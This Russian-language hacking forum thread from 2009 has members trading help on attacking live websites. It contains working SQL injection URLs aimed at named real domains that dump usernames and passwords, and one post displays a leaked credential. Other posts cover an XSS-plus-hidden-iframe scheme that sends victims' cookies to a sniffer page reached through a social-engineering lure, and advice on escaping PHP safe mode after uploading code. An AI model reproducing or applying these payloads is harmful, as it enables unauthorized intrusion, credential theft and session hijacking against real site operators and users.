Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    есть такой вопрос... есть скуля.. через нее заливаю в php но тут трабла... до смд так и не добрался...

    safe mod on
    magic quotes on
    http include disabled

    как можно обойти это? функции вида system exec passthru include copy move_uploaded_file fopen и тд не пашут! c file_get_contents не разобрался до конца..

    помогите +)
     
    #4841 sabe, 22 Jan 2009
    Last edited: 22 Jan 2009
  2. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Заранее извеняюсь если такой вопрос здесь уже был,но я говорю честно гуглил!!!Вопщем есть на сайте пасивная хсс,могу ли я ее использовать в связке с CSRF?Тоесть я на уязвимом форуме кидаю урл на свой сайт в коде страницы которого ява скрипт суть этого скрипта в том чтобы он браузер жертвы отправлял на скрипт уявимый к хсс со всеми вытикающими!Технически это возможно?Еще раз извеняюсь если подобный вопрос уже был!Если что то не ясно спросил говорите!
     
  3. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    технически возможно, но тебе нужно правильно составить запрос, который будет выполнятся от другого пользователя, при условии конечно если он в тот момент будет авторизован.
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    тоесть ты свой php код можешь заливать на серв уже?
     
  5. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Артем Солнце пасиб тебе за помощь!Так будет правильно в коде страниц:
    <script>http://site.ru/bag.php?b=адрес_снифа</script>
    вроде и все же!Иль вродь напутал!А если применить ни тэги <скрипт> а тэги картинки?Забыл в каких тэгах писать нужно!Подскажите если можете!
     
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    попугай
    да... долго думал.. очень)) вышло все намного проще.. вот поделюсь как я обошел сейф мод в моем случае... правда после заливки и так мало что можно зделать )
    терь другой вопрос... как можно редактировать файл.. при сейфмоде.. нужны команды )
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    sabe

    а средствами шелла не редактируется? Прав не хватает?
     
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    попугай
    нет.. все функции отключены... токо eval пашет и ему спасибо)
    могу лол токо unlink делать.. пока что остальные отключены сейфом... идеи? сайт того стоит)
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    ого, всмысле fopen, fwrite, file_put_contents - всё это отключено? ващее...

    а fputs ?
     
  10. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    ты видимо недопонял, что такое CSRF.
    CSRF это межсайтовая имитация запроса пользователя к стороннему сайту, если пользователь в это время авторизован на стороннем сайте. Т.е. если я правильно понял, то ты нашел XSS на форуме, и в связке XSS и CSRF ты можешь сделать следующее:

    Допустим http://forum/bug-script.php?tipic=1 это ссылка бажного форума.
    Ты нашел там XSS и ссылка с ним выглядит допустим так:
    http://forum/bug-script.php?tipic=><script>alert(document.coockie)</script>
    Вот. Но это палевный вариант сувать такую ссылку пользователям.
    Теперь ты на своем сайте допустим hack2009.narod.ru размещаешь в index.html такой код:
    <html>
    <title>ERROR</title>
    <body>
    <b>ERROR</b>
    <iframe style="width:0px; height:0px; border: 0px"
    src="http://forum/bug-script.php?tipic=><script>КОД_ПЕРЕДАЧИ_СНИФЕРУ</script>"></iframe>
    </body>
    </html>
    и пишешь на форуме в ЛС любому пользователю, мол "смотри тут преватное порно hack2009.narod.ru". Он переходит из ЛС на твой сайт и там выполняется CSRF+XSS. Куки твои. Молодец. Пять.

    p.s. может где-то ошибся просто время уже 3:05 :( пиши сюда помогу чем могу
     
    1 person likes this.
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    попугай
    да (
    даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index
     
    #4851 sabe, 22 Jan 2009
    Last edited: 22 Jan 2009
  12. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,version(),user(),database())--
    Не могу понять, нашел все таблицы, но ни в одну не пускает, может ктонить поможет?
     
  13. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    В каком плане "не пускает"?

    Code:
    http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--
     
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    например достаем таблу с пассами..
    осюда и вывод ;)

    slava;1234Slava1
     
    2 people like this.
  15. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    у меня чето ошибку выдовала, хз почему, а эту таблицу ты как нарыл, через limit?
     
  16. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Да, через лимит.
    Возможно, ты не мог сделать вывод к примеру из "ibf_members". Это потому, что таблица лежит в другой бд, "forum.ibf_members"
     
    2 people like this.
  17. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Спасибо, большое! Все понял, а как часто вот так вот нужно к именам таблиц что-то добавлять, и как узнать что именно добавлять?
     
  18. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_name,table_schema)+from+information_schema.tables+limit+45,1--
    table_name - имя таблицы
    table_schema - бд, в которой таблица

    В данном случае - ibf_cal_events:forum, значит запрос будет выглядеть:

    from+froum.ibf_cal_events
     
    #4858 R1dex, 22 Jan 2009
    Last edited: 22 Jan 2009
  19. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Вот еще,
    Code:
    http://rabota.kz/candidates/vacancies.php?cat=123+order+by+2--
    прекрассно видно что только два числа должны отображаться, а при вводе
    Code:
    http://rabota.kz/candidates/vacancies.php?cat=123+union+select+1,2--
    выдает ошибку, объясните плз, где я ошибся? Заранее благодарен!
     
  20. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    версия мускула = 3+ там нет union select
    http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//*
    http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*
     
Thread Status:
Not open for further replies.